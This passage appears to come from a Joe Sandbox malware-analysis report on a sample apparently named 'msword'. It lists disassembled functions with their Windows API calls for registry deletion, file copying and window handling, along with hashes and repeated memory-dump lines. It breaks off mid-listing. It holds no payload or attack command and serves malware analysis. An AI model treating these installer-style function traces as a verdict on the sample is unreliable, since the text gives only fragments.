                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$@rD
                                                                                        • API String ID: 3540041739-1813061909
                                                                                        • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                        • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                        Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: *?|<>/":
                                                                                        • API String ID: 589700163-165019052
                                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                        • API String ID: 1697273262-1764544995
                                                                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                        Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00404902
                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                        • String ID: $@rD
                                                                                        • API String ID: 3748168415-881980237
                                                                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                        • API String ID: 2577523808-3778932970
                                                                                        • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                        • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                        Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcatwsprintf
                                                                                        • String ID: %02x%c$...
                                                                                        • API String ID: 3065427908-1057055748
                                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                        Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                        • API String ID: 2266616436-4211696005
                                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1599320355-0
                                                                                        • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                        • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                        Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
